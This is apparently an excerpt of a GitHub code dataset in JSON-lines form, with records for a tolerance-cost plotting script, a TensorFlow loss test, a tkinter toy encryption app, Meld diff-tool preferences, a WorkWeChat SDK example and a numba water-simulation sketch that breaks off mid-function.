PLOTS_PER_ROW, figsize=(16, 7))\r\n fig.tight_layout(pad=4.4, w_pad=5.5, h_pad=5.0)\r\n # fig.suptitle('histogram for eac dimension of the predicted dataframe - compare to real data')\r\n fig.subplots_adjust(hspace=0.3, wspace=.3)\r\n for index, col in enumerate(df_komplett.columns):\r\n plot = sns.histplot(ax=axs[i][j], data=df_komplett, x=str(col), kde=True)\r\n axs[i][j].axvline(x0[index], 0,10, c=\"red\")\r\n j+=1\r\n if j%PLOTS_PER_ROW==0:\r\n i+=1\r\n j=0\r\n # plt.savefig('Tol-cost-gerissen.svg')\r\n plt.show()\r\n fig, axs = plt.subplots(PLOTS_PER_COL, PLOTS_PER_ROW, figsize=(16, 7))\r\n fig.tight_layout(pad=4.4, w_pad=5.5, h_pad=5.0)\r\n # fig.suptitle('histogram for eac dimension of the predicted dataframe - compare to real data')\r\n fig.subplots_adjust(hspace=0.3, wspace=.3)\r\n for index, col in enumerate(df_toleranz_gerissen.columns):\r\n plot = sns.histplot(ax=axs[i][j], data=df_toleranz_gerissen, x=str(col), kde=True)\r\n axs[i][j].axvline(x0[index], 0,10, c=\"red\")\r\n j+=1\r\n if j%PLOTS_PER_ROW==0:\r\n i+=1\r\n j=0\r\n # plt.savefig('Tol-cost-gerissen.svg')\r\n plt.show()\r\n \r\n \r\n\r\n # visualisierung_für_validierung(x0, df, df_above)\r\n \r\n \r\n # print(\"vorher: \", df.shape, \"----\", \"nachher: \", df_above.shape)\r\n\r\n scrap = df_above.count().to_numpy()[0]\r\n print(f\"--> Costs for Tolerances {x0} is: {scrap}\")\r\n \r\n d = {'Kosten': [scrap]}\r\n df_scrap = pd.DataFrame(data=d)\r\n \r\n x00 = {'Toleranzvektor': [x0]}\r\n df_x00 = pd.DataFrame(data=x00)\r\n \r\n Opts = pd.read_csv('data/Optimierung/Kosten.csv').drop(columns=[\"Unnamed: 0\"], errors='ignore')\r\n Tols = pd.read_csv('data/Optimierung/Toleranzvektor.csv').drop(columns=[\"Unnamed: 0\"], errors='ignore')\r\n Opts_neu = pd.concat([Opts, df_scrap], ignore_index=True)\r\n Tols_neu = pd.concat([Tols, df_x00], ignore_index=True)\r\n \r\n Opts_neu.to_csv('data/Optimierung/Kosten.csv')\r\n Tols_neu.to_csv('data/Optimierung/Toleranzvektor.csv')\r\n\r\n return scrap\r\n\r\n\r\n\r\nif __name__==\"__main__\":\r\n\r\n # x0 = np.random.randint(low=4, high=30, size=10)\r\n x0 = [218.50, 236.94, 155.25, 182.02, 250.00, 187.84, 177.13, 250.00, 246.61, 250.00]\r\n cost_from_tol_hard_approach(x0)","repo_name":"d0sc/BA_BMW","sub_path":"src/model_tol_cost.py","file_name":"model_tol_cost.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28475477075","text":"import pytest\nimport tensorflow as tf\nfrom loguru import logger\n\nfrom hourglass_tensorflow.losses import SigmoidCrossEntropyLoss\nfrom hourglass_tensorflow.utils.tf import tf_bivariate_normal_pdf\n\ntf.config.experimental_run_functions_eagerly(True)\n\n\n# region Fixtures\n\nSAMPLE = {\n \"image\": \"015601864.jpg\",\n \"scale\": \"3.021046176409755\",\n \"bbox_tl_x\": \"627\",\n \"bbox_tl_y\": \"627\",\n \"bbox_br_x\": \"706\",\n \"bbox_br_y\": \"706\",\n \"center_x\": \"594\",\n \"center_y\": \"257\",\n \"joint_0_X\": \"620\",\n \"joint_0_Y\": \"394\",\n \"joint_0_visible\": \"1\",\n \"joint_1_X\": \"616\",\n \"joint_1_Y\": \"269\",\n \"joint_1_visible\": \"1\",\n \"joint_2_X\": \"573\",\n \"joint_2_Y\": \"185\",\n \"joint_2_visible\": \"1\",\n \"joint_3_X\": \"647\",\n \"joint_3_Y\": \"188\",\n \"joint_3_visible\": \"0\",\n \"joint_4_X\": \"661\",\n \"joint_4_Y\": \"221\",\n \"joint_4_visible\": \"1\",\n \"joint_5_X\": \"656\",\n \"joint_5_Y\": \"231\",\n \"joint_5_visible\": \"1\",\n \"joint_6_X\": \"610\",\n \"joint_6_Y\": \"187\",\n \"joint_6_visible\": \"0\",\n \"joint_7_X\": \"647\",\n \"joint_7_Y\": \"176\",\n \"joint_7_visible\": \"1\",\n \"joint_8_X\": \"637\",\n \"joint_8_Y\": \"189\",\n \"joint_8_visible\": \"0\",\n \"joint_9_X\": \"695\",\n \"joint_9_Y\": \"108\",\n \"joint_9_visible\": \"0\",\n \"joint_10_X\": \"606\",\n \"joint_10_Y\": \"217\",\n \"joint_10_visible\": \"1\",\n \"joint_11_X\": \"553\",\n \"joint_11_Y\": \"161\",\n \"joint_11_visible\": \"1\",\n \"joint_12_X\": \"601\",\n \"joint_12_Y\": \"167\",\n \"joint_12_visible\": \"1\",\n \"joint_13_X\": \"692\",\n \"joint_13_Y\": \"185\",\n \"joint_13_visible\": \"1\",\n \"joint_14_X\": \"693\",\n \"joint_14_Y\": \"240\",\n \"joint_14_visible\": \"1\",\n \"joint_15_X\": \"688\",\n \"joint_15_Y\": \"313\",\n \"joint_15_visible\": \"1\",\n \"set\": \"TRAIN\",\n}\n\n\n@pytest.fixture(scope=\"function\")\ndef gt_joints():\n return [\n [620, 394],\n [616, 269],\n [573, 185],\n [647, 188],\n [661, 221],\n [656, 231],\n [610, 187],\n [647, 176],\n [637, 189],\n [695, 108],\n [606, 217],\n [553, 161],\n [601, 167],\n [692, 185],\n [693, 240],\n [688, 313],\n ]\n\n\n@pytest.fixture(scope=\"function\")\ndef head_size(gt_joints):\n return tf.norm(\n tf.constant(gt_joints[9], dtype=tf.float32)\n - tf.constant(gt_joints[8], dtype=tf.float32),\n ord=2,\n )\n\n\n@pytest.fixture(scope=\"function\")\ndef torso_size(gt_joints):\n return tf.norm(\n tf.constant(gt_joints[8], dtype=tf.float32)\n - tf.constant(gt_joints[6], dtype=tf.float32),\n ord=2,\n )\n\n\n@pytest.fixture(scope=\"function\")\ndef error_joints():\n return [\n [30],\n [40],\n [50],\n [60],\n [70],\n [80],\n [90],\n [100],\n [100],\n [100],\n [30],\n [35],\n [40],\n [70],\n [80],\n [90],\n ]\n\n\n@pytest.fixture(scope=\"function\")\ndef pred_joints(gt_joints, error_joints):\n return tf.constant(gt_joints) - tf.constant(error_joints)\n\n\n@pytest.fixture(scope=\"function\")\ndef SHAPE():\n return tf.constant([1280, 720], dtype=tf.dtypes.int32)\n\n\n@pytest.fixture(scope=\"function\")\ndef STDDEV():\n return tf.constant([5.0, 5.0], dtype=tf.dtypes.float32)\n\n\n@pytest.fixture(scope=\"function\")\ndef gt_heatmap(gt_joints, SHAPE, STDDEV):\n return tf.transpose(\n tf.map_fn(\n fn=lambda x: tf_bivariate_normal_pdf(\n tf.cast(x, tf.float32), stddev=STDDEV, shape=SHAPE\n ),\n elems=tf.cast(tf.constant(gt_joints), dtype=tf.dtypes.int32),\n dtype=tf.float32,\n ),\n perm=[1, 2, 0],\n )\n\n\n@pytest.fixture(scope=\"function\")\ndef pred_heatmap(pred_joints, SHAPE, STDDEV):\n return tf.transpose(\n tf.map_fn(\n fn=lambda x: tf_bivariate_normal_pdf(\n tf.cast(x, tf.float32), stddev=STDDEV, shape=SHAPE\n ),\n elems=tf.cast(tf.constant(pred_joints), dtype=tf.dtypes.int32),\n dtype=tf.float32,\n ),\n perm=[1, 2, 0],\n )\n\n\n@pytest.fixture(scope=\"function\")\ndef y_true_nosup(gt_heatmap):\n return tf.expand_dims(gt_heatmap, axis=0)\n\n\n@pytest.fixture(scope=\"function\")\ndef y_pred_nosup(pred_heatmap):\n return tf.expand_dims(pred_heatmap, axis=0)\n\n\n@pytest.fixture(scope=\"function\")\ndef y_true(gt_heatmap):\n return tf.expand_dims(tf.expand_dims(gt_heatmap, axis=0), axis=0)\n\n\n@pytest.fixture(scope=\"function\")\ndef y_pred(pred_heatmap):\n return tf.expand_dims(tf.expand_dims(pred_heatmap, axis=0), axis=0)\n\n\n# endregion\n\n\ndef test_sigmoid_cross_entropy_loss(y_true, y_pred):\n epsilon = tf.constant(0.00001)\n estimated_error = tf.constant(0.6931466)\n\n loss = SigmoidCrossEntropyLoss()\n loss.call(y_true, y_pred)\n\n assert (\n tf.abs(loss(y_true, y_pred) - estimated_error) <= epsilon\n ), f\"{loss.__class__.__name__} estimated error is incorrect. EXPECTED {estimated_error}. RECEIVED: {loss(y_true, y_pred)}\"\n","repo_name":"wbenbihi/hourglasstensorflow","sub_path":"tests/test_losses.py","file_name":"test_losses.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"en","doc_type":"code","stars":479,"dataset":"github-code","pt":"3"} +{"seq_id":"8296143490","text":"from tkinter import *\r\nimport base64\r\nfrom tkinter import messagebox\r\nroot = Tk()\r\n\r\nroot.geometry(\"600x300\")\r\n\r\nroot.title(\" Message Encryption and Decryption\")\r\n\r\n\r\nMsg = StringVar()\r\nkey = StringVar()\r\nmode = StringVar()\r\nResult = StringVar()\r\n\r\nlabel = Label(root, text='Enter Message', font=('Helvetica',10))\r\nlabel.place(x=10,y=0)\r\n\r\nmes = Entry(root,textvariable=Msg, font=('calibre',10,'normal'))\r\nmes.place(x=200,y=0)\r\n\r\nlabel1 = Label(root, text='e for encrypt and d for decrypt', font=('Helvetica',10))\r\nlabel1.place(x=10,y=50)\r\n\r\nl_mode = Entry(root, textvariable=mode, font=('calibre',10,'normal'))\r\nl_mode.place(x=200,y=50)\r\n\r\nlabel2 = Label(root, text='Enter key', font=('Helvetica',10))\r\nlabel2.place(x=10,y=100)\r\n\r\nl_key = Entry(root, textvariable=key, font=('calibre',10,'normal'))\r\nl_key.place(x=200,y=100)\r\n\r\nlabel3 = Label(root, text='Result', font=('Helvetica',10))\r\nlabel3.place(x=10,y=150)\r\n\r\nres = Entry(root,textvariable=Result, font=('calibre',10,'normal'))\r\nres.place(x=200,y=150)\r\n\r\n\r\ndef encode(key, msg):\r\n enc = []\r\n for i in range(len(msg)):\r\n key_c = key[i % len(key)]\r\n enc_c = chr((ord(msg[i]) +\r\n ord(key_c)) % 256)\r\n enc.append(enc_c)\r\n return base64.urlsafe_b64encode(\"\".join(enc).encode()).decode()\r\n\r\n\r\n\r\ndef decode(key, enc):\r\n dec = []\r\n enc = base64.urlsafe_b64decode(enc).decode()\r\n for i in range(len(enc)):\r\n key_c = key[i % len(key)]\r\n dec_c = chr((256 + ord(enc[i]) - ord(key_c)) % 256)\r\n\r\n dec.append(dec_c)\r\n return \"\".join(dec)\r\n\r\n\r\ndef Results():\r\n msg = Msg.get()\r\n k = key.get()\r\n m = mode.get()\r\n m.lower()\r\n if (m == 'e'):\r\n Result.set(encode(k, msg))\r\n elif(m== 'd'):\r\n Result.set(decode(k, msg))\r\n else:\r\n messagebox.showinfo('Shantanu', 'Wrong mode entered. Try again.')\r\n\r\n\r\n\r\ndef qExit():\r\n root.destroy()\r\n\r\n\r\n\r\ndef Reset():\r\n Msg.set(\"\")\r\n key.set(\"\")\r\n mode.set(\"\")\r\n Result.set(\"\")\r\n\r\n\r\nbtnshow = Button(root, text='Show Message', foreground='green', command=Results)\r\nbtnshow.place(x=10,y=200)\r\n\r\nbtnreset = Button(root, text='Reset', foreground='red', command=Reset)\r\nbtnshow.place(x=150,y=200)\r\n\r\nbtnexit = Button(root, text='Exit', foreground='black', command=qExit)\r\nbtnshow.place(x=300,y=200)\r\n\r\n\r\nroot.mainloop()\r\n","repo_name":"ghostpye07/Python_projects","sub_path":"Message Encoding and Decoding app.py","file_name":"Message Encoding and Decoding app.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"10658891618","text":"from gettext import gettext as _\n\nimport gtk\n\nfrom ui import gnomeglade\nimport misc\nimport paths\nfrom util import prefs\nimport vc\n\nfrom util.sourceviewer import srcviewer\n\n\nclass ListWidget(gnomeglade.Component):\n def __init__(self, columns, prefs, key):\n gnomeglade.Component.__init__(self, paths.ui_dir(\"preferences.glade\"), \"listwidget\")\n self.prefs = prefs\n self.key = key\n self.treeview.set_model( gtk.ListStore( *[c[1] for c in columns] ) )\n view = self.treeview\n def addTextCol(label, colnum):\n model = view.get_model()\n rentext = gtk.CellRendererText()\n rentext.props.editable = 1\n def change_text(ren, path, text):\n model[path][colnum] = text\n self._update_filter_string()\n rentext.connect(\"edited\", change_text)\n column = gtk.TreeViewColumn(label, rentext, text=colnum)\n view.append_column(column)\n def addToggleCol(label, colnum):\n model = view.get_model()\n rentoggle = gtk.CellRendererToggle()\n def change_toggle(ren, path):\n model[path][colnum] = not ren.get_active()\n self._update_filter_string()\n rentoggle.connect(\"toggled\", change_toggle)\n column = gtk.TreeViewColumn(label, rentoggle, active=colnum)\n view.append_column(column)\n for c,i in zip( columns, range(len(columns))):\n if c[1] == type(\"\"):\n addTextCol(c[0], i)\n elif c[1] == type(0):\n addToggleCol( c[0], 1)\n view.get_selection().connect('changed', self._update_sensitivity)\n view.get_model().connect('row-inserted', self._update_sensitivity)\n view.get_model().connect('rows-reordered', self._update_sensitivity)\n self._update_sensitivity()\n self._update_filter_model()\n\n def _update_sensitivity(self, *args):\n (model, it, path) = self._get_selected()\n if not it:\n self.item_delete.set_sensitive(False)\n self.item_up.set_sensitive(False)\n self.item_down.set_sensitive(False)\n else:\n self.item_delete.set_sensitive(True)\n self.item_up.set_sensitive(path > 0)\n self.item_down.set_sensitive(path < len(model) - 1)\n\n def on_item_new_clicked(self, button):\n model = self.treeview.get_model()\n model.append([_(\"label\"), 0, _(\"pattern\")])\n self._update_filter_string()\n def _get_selected(self):\n (model, it) = self.treeview.get_selection().get_selected()\n if it:\n path = model.get_path(it)[0]\n else:\n path = None\n return (model, it, path)\n def on_item_delete_clicked(self, button):\n (model, it, path) = self._get_selected()\n model.remove(it)\n self._update_filter_string()\n def on_item_up_clicked(self, button):\n (model, it, path) = self._get_selected()\n model.swap(it, model.get_iter(path - 1))\n self._update_filter_string()\n def on_item_down_clicked(self, button):\n (model, it, path) = self._get_selected()\n model.swap(it, model.get_iter(path + 1))\n self._update_filter_string()\n def on_items_revert_clicked(self, button):\n setattr( self.prefs, self.key, self.prefs.get_default(self.key) )\n self._update_filter_model()\n def _update_filter_string(self):\n model = self.treeview.get_model()\n pref = []\n for row in model:\n pref.append(\"%s\\t%s\\t%s\" % (row[0], row[1], row[2]))\n setattr( self.prefs, self.key, \"\\n\".join(pref) )\n def _update_filter_model(self):\n model = self.treeview.get_model()\n model.clear()\n for filtstring in getattr( self.prefs, self.key).split(\"\\n\"):\n filt = misc.ListItem(filtstring)\n model.append([filt.name, filt.active, filt.value])\n \n\nclass PreferencesDialog(gnomeglade.Component):\n\n def __init__(self, parentapp):\n gnomeglade.Component.__init__(self, paths.ui_dir(\"preferences.glade\"), \"preferencesdialog\")\n self.widget.set_transient_for(parentapp.widget)\n self.prefs = parentapp.prefs\n if not self.prefs.use_custom_font:\n self.checkbutton_default_font.set_active(True)\n self.fontpicker.set_sensitive(False)\n else:\n self.checkbutton_default_font.set_active(False)\n self.fontpicker.set_sensitive(True)\n self.fontpicker.set_font_name(self.prefs.custom_font)\n self.fontpicker.set_font_name( self.prefs.custom_font )\n self.spinbutton_tabsize.set_value( self.prefs.tab_size )\n if srcviewer.gsv is not None:\n self.checkbutton_spaces_instead_of_tabs.set_active( self.prefs.spaces_instead_of_tabs )\n self.checkbutton_show_line_numbers.set_active( self.prefs.show_line_numbers )\n self.checkbutton_use_syntax_highlighting.set_active( self.prefs.use_syntax_highlighting )\n else:\n self.checkbutton_spaces_instead_of_tabs.set_sensitive(False)\n self.checkbutton_show_line_numbers.set_sensitive(False)\n self.checkbutton_use_syntax_highlighting.set_sensitive(False)\n if gtk.pygtk_version >= (2, 12, 0):\n no_sourceview_text = _(\"Only available if you have gnome-python-desktop installed\")\n self.checkbutton_spaces_instead_of_tabs.set_tooltip_text(no_sourceview_text)\n self.checkbutton_show_line_numbers.set_tooltip_text(no_sourceview_text)\n self.checkbutton_use_syntax_highlighting.set_tooltip_text(no_sourceview_text)\n # TODO: This doesn't restore the state of character wrapping when word\n # wrapping is disabled, but this is hard with our existing gconf keys\n if self.prefs.edit_wrap_lines != gtk.WRAP_NONE:\n if self.prefs.edit_wrap_lines == gtk.WRAP_CHAR:\n self.checkbutton_split_words.set_active(False)\n self.checkbutton_wrap_text.set_active(True)\n\n size_group = gtk.SizeGroup(gtk.SIZE_GROUP_HORIZONTAL)\n size_group.add_widget(self.label1)\n size_group.add_widget(self.label2)\n size_group.add_widget(self.label16)\n use_default = self.prefs.edit_command_type == \"internal\" or \\\n self.prefs.edit_command_type == \"gnome\"\n self.system_editor_checkbutton.set_active(use_default)\n self.custom_edit_command_entry.set_sensitive(not use_default)\n self.custom_edit_command_entry.set_text( \" \".join(self.prefs.get_custom_editor_command([])) )\n\n # file filters\n cols = [ (_(\"Name\"), type(\"\")), (_(\"Active\"), type(0)), (_(\"Pattern\"), type(\"\")) ]\n self.filefilter = ListWidget( cols, self.prefs, \"filters\")\n self.file_filters_tab.pack_start(self.filefilter.widget)\n self.checkbutton_ignore_symlinks.set_active( self.prefs.ignore_symlinks)\n # text filters\n cols = [ (_(\"Name\"), type(\"\")), (_(\"Active\"), type(0)), (_(\"Regex\"), type(\"\")) ]\n self.textfilter = ListWidget( cols, self.prefs, \"regexes\")\n self.text_filters_tab.pack_start(self.textfilter.widget)\n self.checkbutton_ignore_blank_lines.set_active( self.prefs.ignore_blank_lines )\n # encoding\n self.entry_text_codecs.set_text( self.prefs.text_codecs )\n #\n # editor\n #\n def on_fontpicker_font_set(self, picker):\n self.prefs.custom_font = picker.get_font_name()\n\n def on_checkbutton_default_font_toggled(self, button):\n use_custom = not button.get_active()\n self.fontpicker.set_sensitive(use_custom)\n self.prefs.use_custom_font = use_custom\n\n def on_spinbutton_tabsize_changed(self, spin):\n self.prefs.tab_size = int(spin.get_value())\n def on_checkbutton_spaces_instead_of_tabs_toggled(self, check):\n self.prefs.spaces_instead_of_tabs = check.get_active()\n\n def on_checkbutton_wrap_text_toggled(self, button):\n if not self.checkbutton_wrap_text.get_active():\n self.prefs.edit_wrap_lines = 0\n self.checkbutton_split_words.set_sensitive(False)\n else:\n self.checkbutton_split_words.set_sensitive(True)\n if self.checkbutton_split_words.get_active():\n self.prefs.edit_wrap_lines = 2\n else:\n self.prefs.edit_wrap_lines = 1\n\n def on_checkbutton_show_line_numbers_toggled(self, check):\n self.prefs.show_line_numbers = check.get_active()\n def on_checkbutton_use_syntax_highlighting_toggled(self, check):\n self.prefs.use_syntax_highlighting = check.get_active()\n\n def on_system_editor_checkbutton_toggled(self, check):\n use_default = check.get_active()\n self.custom_edit_command_entry.set_sensitive(not use_default)\n if use_default:\n self.prefs.edit_command_type = \"gnome\"\n else:\n self.prefs.edit_command_type = \"custom\"\n\n def on_custom_edit_command_entry_activate(self, entry, *args):\n # Called on \"activate\" and \"focus-out-event\"\n self.prefs.edit_command_custom = entry.props.text\n\n #\n # filters\n #\n def on_checkbutton_ignore_symlinks_toggled(self, check):\n self.prefs.ignore_symlinks = check.get_active()\n def on_checkbutton_ignore_blank_lines_toggled(self, check):\n self.prefs.ignore_blank_lines = check.get_active()\n\n def on_entry_text_codecs_activate(self, entry, *args):\n # Called on \"activate\" and \"focus-out-event\"\n self.prefs.text_codecs = entry.props.text\n\n def on_response(self, dialog, response_id):\n self.widget.destroy()\n\n\nclass MeldPreferences(prefs.Preferences):\n defaults = {\n \"window_size_x\": prefs.Value(prefs.INT, 600),\n \"window_size_y\": prefs.Value(prefs.INT, 600),\n \"use_custom_font\": prefs.Value(prefs.BOOL,0),\n \"custom_font\": prefs.Value(prefs.STRING,\"monospace, 14\"),\n \"tab_size\": prefs.Value(prefs.INT, 4),\n \"spaces_instead_of_tabs\": prefs.Value(prefs.BOOL, False),\n \"show_line_numbers\": prefs.Value(prefs.BOOL, 0),\n \"use_syntax_highlighting\": prefs.Value(prefs.BOOL, 0),\n \"edit_wrap_lines\" : prefs.Value(prefs.INT, 0),\n \"edit_command_type\" : prefs.Value(prefs.STRING, \"gnome\"), #gnome, custom\n \"edit_command_custom\" : prefs.Value(prefs.STRING, \"gedit\"),\n \"text_codecs\": prefs.Value(prefs.STRING, \"utf8 latin1\"),\n \"ignore_symlinks\": prefs.Value(prefs.BOOL,0),\n \"vc_console_visible\": prefs.Value(prefs.BOOL, 0),\n \"color_delete_bg\" : prefs.Value(prefs.STRING, \"#003300\"),\n \"color_delete_fg\" : prefs.Value(prefs.STRING, \"Red\"),\n \"color_replace_bg\" : prefs.Value(prefs.STRING, \"#112233\"),\n \"color_replace_fg\" : prefs.Value(prefs.STRING, \"gray80\"),\n \"color_conflict_bg\" : prefs.Value(prefs.STRING, \"Brown\"),\n \"color_conflict_fg\" : prefs.Value(prefs.STRING, \"White\"),\n \"color_inline_bg\" : prefs.Value(prefs.STRING, \"#223344\"),\n \"color_inline_fg\" : prefs.Value(prefs.STRING, \"White\"),\n \"color_edited_bg\" : prefs.Value(prefs.STRING, \"gray20\"),\n \"color_edited_fg\" : prefs.Value(prefs.STRING, \"White\"),\n \"filters\" : prefs.Value(prefs.STRING,\n #TRANSLATORS: translate this string ONLY to the first \"\\t\", leave it and the following parts intact\n _(\"Backups\\t1\\t#*# .#* ~* *~ *.{orig,bak,swp}\\n\") + \\\n #TRANSLATORS: translate this string ONLY to the first \"\\t\", leave it and the following parts intact\n _(\"Version Control\\t1\\t%s\\n\") % misc.shell_escape(' '.join(vc.get_plugins_metadata())) + \\\n #TRANSLATORS: translate this string ONLY to the first \"\\t\", leave it and the following parts intact\n _(\"Binaries\\t1\\t*.{pyc,a,obj,o,so,la,lib,dll}\\n\") + \\\n #TRANSLATORS: translate this string ONLY to the first \"\\t\", leave it and the following parts intact\n _(\"Media\\t0\\t*.{jpg,gif,png,wav,mp3,ogg,xcf,xpm}\")),\n #TRANSLATORS: translate this string ONLY to the first \"\\t\", leave it and the following parts intact\n \"regexes\" : prefs.Value(prefs.STRING, _(\"CVS keywords\\t0\\t\\$\\\\w+(:[^\\\\n$]+)?\\$\\n\") + \\\n #TRANSLATORS: translate this string ONLY to the first \"\\t\", leave it and the following parts intact\n _(\"C++ comment\\t0\\t//.*\\n\") + \\\n #TRANSLATORS: translate this string ONLY to the first \"\\t\", leave it and the following parts intact\n _(\"C comment\\t0\\t/\\*.*?\\*/\\n\") + \\\n #TRANSLATORS: translate this string ONLY to the first \"\\t\", leave it and the following parts intact\n _(\"All whitespace\\t0\\t[ \\\\t\\\\r\\\\f\\\\v]*\\n\") + \\\n #TRANSLATORS: translate this string ONLY to the first \"\\t\", leave it and the following parts intact\n _(\"Leading whitespace\\t0\\t^[ \\\\t\\\\r\\\\f\\\\v]*\\n\") + \\\n #TRANSLATORS: translate this string ONLY to the first \"\\t\", leave it and the following parts intact\n _(\"Script comment\\t0\\t#.*\")),\n \"ignore_blank_lines\" : prefs.Value(prefs.BOOL, False),\n \"toolbar_visible\" : prefs.Value(prefs.BOOL, True),\n \"statusbar_visible\" : prefs.Value(prefs.BOOL, True)\n }\n\n def __init__(self):\n super(MeldPreferences, self).__init__(\"/apps/meld\", self.defaults)\n\n def get_current_font(self):\n if self.use_custom_font:\n return self.custom_font\n else:\n if not hasattr(self, \"_gconf\"):\n return \"Monospace 10\"\n return self._gconf.get_string('/desktop/gnome/interface/monospace_font_name') or \"Monospace 10\"\n\n def get_toolbar_style(self):\n if not hasattr(self, \"_gconf\"):\n return gtk.TOOLBAR_BOTH\n style = self._gconf.get_string('/desktop/gnome/interface/toolbar_style') or \"both\"\n style = {\"both\":gtk.TOOLBAR_BOTH, \"text\":gtk.TOOLBAR_TEXT,\n \"icon\":gtk.TOOLBAR_ICONS, \"icons\":gtk.TOOLBAR_ICONS,\n \"both_horiz\":gtk.TOOLBAR_BOTH_HORIZ,\n \"both-horiz\":gtk.TOOLBAR_BOTH_HORIZ\n }[style]\n return style\n\n def get_gnome_editor_command(self, files):\n if not hasattr(self, \"_gconf\"):\n return []\n argv = []\n editor = self._gconf.get_string('/desktop/gnome/applications/editor/exec') or \"gedit\"\n if self._gconf.get_bool(\"/desktop/gnome/applications/editor/needs_term\"):\n texec = self._gconf.get_string(\"/desktop/gnome/applications/terminal/exec\")\n if texec:\n argv.append(texec)\n targ = self._gconf.get_string(\"/desktop/gnome/applications/terminal/exec_arg\")\n if targ:\n argv.append(targ)\n argv.append( \"%s %s\" % (editor, \" \".join( [f.replace(\" \",\"\\\\ \") for f in files]) ) )\n else:\n argv = [editor] + files\n return argv\n\n def get_custom_editor_command(self, files):\n return self.edit_command_custom.split() + files\n\n","repo_name":"hbt/meld","sub_path":"meld/preferences.py","file_name":"preferences.py","file_ext":"py","file_size_in_byte":14966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27365308704","text":"import os\n\nimport work_wechat\n\ncorpid = os.environ.get(\"CORPID\")\ncorpsecret = os.environ.get(\"CORPSECRET\")\nmydepartid = os.environ.get(\"MYDEPARTID\")\n\nww = work_wechat.WorkWeChat(corpid=corpid, corpsecret=corpsecret)\nrs = ww.user_simplelist(department_id=mydepartid, fetch_child=True)\nprint(rs)\n","repo_name":"softpeng/WorkWeChatSDK","sub_path":"examples/get_employee_list_by_depart.py","file_name":"get_employee_list_by_depart.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"44417834709","text":"import numba as nb\nimport numpy as np\nfrom OpenGL.GL import *\nfrom numpy.random import randint\nimport math\nfrom glfw import *\nimport platform\nimport os\ntry:\n del os.environ['DISPLAY']\nexcept:\n pass\n\nenv = platform.system()\nwindowsize = (800 * 2, 600 * 2) if env == 'Darwin' else (800, 600)\n\n__buffer = np.zeros(windowsize[0] * windowsize[1] * 3)\n\n\n@nb.jit()\ndef iterBuff(buffer, func):\n for i, v in enumerate(buffer):\n buffer[i] = func(i, v)\n return buffer\n\n\ndef create_buffer_editor(callback):\n @nb.jit(nopython=True)\n def func(buffer):\n for i, v in enumerate(buffer):\n buffer[i] = callback(i, v)\n return buffer\n return func\n \n@nb.jit(nopython=True, fastmath=True)\ndef control(i, v):\n pass\niterBuffer = create_buffer_editor(control)\n\n@nb.jit(nopython=True, fastmath=True)\ndef update_process(i, v):\n pass\nupdate_buffer = create_buffer_editor(update_process)\n\n\n@nb.jit(nopython=True, fastmath=True)\ndef has(vec, val):\n res = False\n if np.where(vec == val)[0].shape[0] > 0:\n res = True\n return res\nset\n\n@nb.jit(nopython=True, fastmath=True)\ndef idx(x, y):\n return (y * windowsize[0] + x) * 3\n\ndef fill_water(x, y):\n if(idx(x, y) < len(__buffer)):\n __buffer[idx(x, y)] = 0\n __buffer[idx(x, y) + 1] = 0\n __buffer[idx(x, y) + 2] = 255\n\n\n@nb.jit(nopython=True, fastmath=True)\ndef validate_frag(buffer, base_index, rgb):\n return (\n buffer[base_index] == rgb[0] \n and buffer[base_index + 1] == rgb[1] \n and buffer[base_index + 2] == rgb[2]\n )\n\n@nb.jit(nopython=True, fastmath=True)\ndef is_fragment_empty(buffer, index):\n return validate_frag(buffer, index, (0, 0, 0))\n\n\n@nb.jit(nopython=True, fastmath=True)\ndef exists(buffer, index):\n return index <= len(buffer)\n\n@nb.jit(nopython=True, fastmath=True)\ndef update_water(time, buffer, sandy): # sandy는 테스트\n mem = np.zeros(windowsize[0] * windowsize[1] * 3) # 한 번만 업데이트하게 하기 위함(255가 아니여도 된다.). 비효율적이므로 수정 ㄱ\n for y in range(windowsize[1]):\n for x in range(windowsize[0]):\n \n current = idx(x, y)\n down = idx(x, y + 1)\n left_down = idx(x - 1, y + 1)\n right_down = idx(x + 1, y + 1)\n left = idx(x - 1, y)\n right = idx(x + 1, y)\n\n if(exists(buffer, down + 2) and mem[current] == 0): # 주기 정하려면 time % ms == 0 추가, 한 번만 업데이트하게 하기 위함. 비효율적이므로 수정 ㄱ\n is_blue = validate_frag(buffer, current, (0, 0, 255))\n if(is_blue and is_fragment_empty(buffer, down)):\n mem[down] = 255\n buffer[down + 2] = 255 # 아래 채우기\n buffer[current + 2] = 0 # 현재 위치 지우기\n\n elif(is_blue and is_fragment_empty(buffer, left_down)):\n mem[left_down] = 255\n buffer[left_down + 2] = 255\n buffer[current + 2] = 0\n\n elif(is_blue and is_fragment_empty(buffer, right_down)): # 고체 가루와 비슷..\n mem[right_down] = 255\n buffer[right_down + 2] = 255\n buffer[current + 2] = 0\n \n elif(is_blue and is_fragment_empty(buffer, right) and not sandy): # 부터는 액체의 특성을 가짐\n mem[right] = 255\n buffer[right + 2] = 255\n buffer[current + 2] = 0 \n\n elif(is_blue and is_fragment_empty(buffer, left) and not sandy):\n mem[left] = 255\n buffer[left + 2] = 255\n buffer[current + 2] = 0 \n\nwater_fill_range = 100\ndef on_drag(x, y):\n fill_water(x, y)\n\n for i in range(100):\n fill_water(x + randint(-water_fill_range, water_fill_range), y + randint(-water_fill_range, water_fill_range))\n\nclick = False\ndef on_click(window, button ,action, asdf):\n global click\n if(button == MOUSE_BUTTON_LEFT):\n if(action == PRESS):\n click = True\n elif(action == RELEASE):\n click = False\ndef on_move(window, x, y):\n new_x = (2 if env == 'Darwin' else 1) * x\n new_y = (2 if env == 'Darwin' else 1) * y\n if(click):\n fill_water(math.floor(new_x), math.floor(new_y))\n\n for i in range(10):\n fill_water(math.floor(new_x) + randint(-water_fill_range, water_fill_range), math.floor(new_y) + randint(-water_fill_range, water_fill_range))\ndef main(title, version):\n time = 0\n init()\n window = create_window(\n windowsize[0] // 2 if env == 'Darwin' else windowsize[0], \n windowsize[1] // 